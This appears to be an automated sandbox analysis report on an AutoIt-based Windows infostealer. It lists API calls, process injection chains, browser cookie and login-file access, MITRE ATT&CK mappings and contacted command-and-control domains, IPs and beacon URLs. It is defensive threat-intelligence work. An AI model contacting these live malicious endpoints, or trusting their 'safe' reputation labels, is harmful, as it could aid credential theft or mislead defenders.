            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000DB226 SendInput,keybd_event
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000F22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
            Source: C:\Users\user\Desktop\031215-Revised-01.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\031215-Revised-01.exe"
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe | Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_000D0B62
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_000D1663
            Source: 031215-Revised-01.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 031215-Revised-01.exe, EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005994727.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519301635.0000000001740000.00000002.00000001.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2154984442.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00090698 cpuid 0_2_00090698
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_000E8195
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000CD27A GetUserNameW,0_2_000CD27A
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000ABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000ABB6F
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000742DE

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasdial.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: 031215-Revised-01.exe | Binary or memory string: WIN_81
Source: 031215-Revised-01.exe | Binary or memory string: WIN_XP
Source: 031215-Revised-01.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 031215-Revised-01.exe | Binary or memory string: WIN_XPe
Source: 031215-Revised-01.exe | Binary or memory string: WIN_VISTA
Source: 031215-Revised-01.exe | Binary or memory string: WIN_7
Source: 031215-Revised-01.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_000F1204
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_000F1806
MITRE ATT&CK Matrix (techniques are listed per tactic column; a leading number is the match count as it appears in the report's matrix, techniques without a number were not matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1499198; sample: 031215-Revised-01.exe; start date: 26/08/2024; architecture: WINDOWS; score: 100). Nodes and edges recovered from the graph:

• Start node: signatures Malicious sample detected (through community Yara rule), Antivirus detection for URL or domain, Multi AV Scanner detection for submitted file and 4 other signatures; DNS/IP nodes www.jaxo.xyz (Performs DNS queries to domains with low reputation), www.weep.site and 11 other IPs or domains; starts 031215-Revised-01.exe.
• 031215-Revised-01.exe (started): Binary is likely a compiled AutoIt script file, Found API chain indicative of sandbox detection, Writes to foreign memory regions and 2 other signatures; starts svchost.exe.
• svchost.exe (started): Maps a DLL or memory area into another process; injects EsAzcOtjoknfjP.exe.
• EsAzcOtjoknfjP.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); starts rasdial.exe.
• rasdial.exe (started): Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal browser information (history, passwords, etc), Modifies the context of a thread in another process (thread injection) and 3 other signatures; injects EsAzcOtjoknfjP.exe and starts firefox.exe.
• EsAzcOtjoknfjP.exe (injected by rasdial.exe): Found direct / indirect Syscall (likely to bypass EDR); DNS/IP nodes www.jaxo.xyz 66.29.149.180 (ports 49755, 49756, 49757; ADVANTAGECOMUS, United States), www.xforum.tech 103.224.182.242 (ports 49759, 49760, 49761; TRELLIAN-AS-APTrellianPtyLimitedAU, Australia) and 7 other IPs or domains.
• firefox.exe (started).

Source | Detection | Scanner | Label | Link
031215-Revised-01.exe | 37% | ReversingLabs | |
031215-Revised-01.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.ayypromo.shop0%Avira URL Cloudsafe
            https://tilda.cc0%Avira URL Cloudsafe
            https://mgmasistencia.com/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/0%Avira URL Cloudsafe
            https://mgmasistencia.com/acerca-de/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            https://twitter.com/wordpress0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%Avira URL Cloudsafe
            http://www.ayypromo.shop/rgqx/0%Avira URL Cloudsafe
            https://es.wordpress.org/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%Avira URL Cloudsafe
            https://mgmasistencia.com/blog/0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/0%Avira URL Cloudsafe
            http://www.ayypromo.shop/rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.40%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/wp-json/0%Avira URL Cloudsafe
            https://mgmasistencia.com/comments/feed/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg0%Avira URL Cloudsafe
            https://mgmasistencia.com/contacto/0%Avira URL Cloudsafe
            http://www.weep.site/v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyh100%Avira URL Cloudmalware
            http://www.xforum.tech/647x/?3L9l=FnaXBox540%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.jaxo.xyz/f9bc/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.40%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyh0%Avira URL Cloudsafe
            https://mgmasistencia.com/feed/0%Avira URL Cloudsafe
            http://www.redhat.com/docs/manuals/enterprise/0%Avira URL Cloudsafe
            https://wordpress.org/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/0%Avira URL Cloudsafe
            https://mgmasistencia.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-10%Avira URL Cloudsafe
            http://www.redhat.com/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ayypromo.shop
            176.57.64.102
            truefalse
              unknown
              fontanerourgente.net
              37.187.158.211
              truefalse
                unknown
                www.jaxo.xyz
                66.29.149.180
                truetrue
                  unknown
                  weep.site
                  194.233.65.154
                  truefalse
                    unknown
                    32wxd.top
                    206.119.82.116
                    truefalse
                      unknown
                      www.cannulafactory.top
                      18.183.3.45
                      truefalse
                        unknown
                        www.onlytradez.club
                        167.172.133.32
                        truefalse
                          unknown
                          www.88nn.pro
                          45.157.69.194
                          truefalse
                            unknown
                            www.xforum.tech
                            103.224.182.242
                            truefalse
                              unknown
                              www.weep.site
                              unknown
                              unknowntrue
                                unknown
                                www.taapbit.online
                                unknown
                                unknowntrue
                                  unknown
                                  www.fontanerourgente.net
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.32wxd.top
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.cannulafactory.top/l90v/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ayypromo.shop/rgqx/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.32wxd.top/kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.xforum.tech/647x/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ayypromo.shop/rgqx/?3L9l=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.onlytradez.club/zctj/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.32wxd.top/kyiu/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.onlytradez.club/zctj/?3L9l=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontanerourgente.net/t3gh/?3L9l=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.cannulafactory.top/l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.88nn.pro/l4rw/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.weep.site/v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.88nn.pro/l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyhfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jaxo.xyz/f9bc/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontanerourgente.net/t3gh/false
                                      • Avira URL Cloud: safe
                                      unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/acerca-de/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4 | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/ | EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://tilda.cc | rasdial.exe, 00000006.00000002.3520253093.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004696000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ayypromo.shop | EsAzcOtjoknfjP.exe, 00000008.00000002.3521236665.0000000005965000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | rasdial.exe, 00000006.00000002.3520253093.00000000056B4000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003874000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000AD44000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4 | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://twitter.com/wordpress | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/blog/ | rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
